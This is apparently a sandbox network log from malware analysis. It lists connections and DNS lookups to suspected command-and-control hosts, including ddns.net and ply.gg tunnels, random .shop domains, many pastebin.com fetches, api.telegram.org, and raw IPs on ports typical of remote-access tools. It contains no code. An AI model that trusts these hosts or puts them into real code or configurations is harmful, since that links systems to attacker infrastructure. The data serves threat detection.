| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| VN | 14.243.221.170:3322 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 73.62.14.5:4782 | tcp | |
| KR | 146.56.118.137:80 | 146.56.118.137 | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 209.38.221.184:8080 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 46.235.26.83:8080 | tcp | |
| US | 8.8.8.8:53 | GDinpHlLXN.GDinpHlLXN | udp |
| NL | 89.110.69.103:80 | 89.110.69.103 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| HK | 156.245.12.92:8000 | 156.245.12.92 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| HK | 156.245.12.57:8000 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 3.70.228.168:555 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | berrylinyj.cyou | udp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 147.28.185.29:80 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| NL | 206.166.251.4:8080 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| VN | 14.243.221.170:3322 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| KR | 152.67.212.187:443 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| TR | 94.156.177.33:80 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| FR | 51.159.4.50:8080 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | late-lil.at.ply.gg | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| TR | 94.156.177.33:80 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 167.235.70.96:8080 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| VN | 14.243.221.170:3322 | tcp | |
| US | 73.62.14.5:4782 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 194.164.198.113:8080 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| GB | 132.145.17.167:9090 | 132.145.17.167 | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| DE | 3.70.228.168:555 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 73.62.14.5:4782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | profile-indians.gl.at.ply.gg | udp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:1504 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| US | 73.62.14.5:4782 | tcp | |
| KR | 152.67.212.187:443 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | fivexx5ht.top | udp |
| VN | 14.243.221.170:3322 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 209.38.221.184:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 46.235.26.83:8080 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 98.51.190.130:20 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 3.70.228.168:555 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 98.51.190.130:20 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| IT | 185.225.73.67:1050 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| FR | 51.159.4.50:8080 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| HK | 117.18.7.76:3782 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 192.168.56.1:4782 | tcp | |
| N/A | 127.0.0.1:1504 | tcp | |
| TR | 94.156.177.33:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.81.68.156:80 | 185.81.68.156 | tcp |
| DE | 3.70.228.168:555 | tcp | |
| US | 98.51.190.130:20 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| N/A | 127.0.0.1:5552 | tcp | |
| US | 147.185.221.17:39017 | profile-indians.gl.at.ply.gg | tcp |
| IT | 185.225.73.67:1050 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 167.235.70.96:8080 | tcp | |
| VN | 14.243.221.170:3322 | tcp | |
| US | 147.185.221.229:35022 | late-lil.at.ply.gg | tcp |
| US | 73.62.14.5:4782 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 66.45.226.53:7777 | tcp | |
| HK | 117.18.7.76:3782 | tcp | |
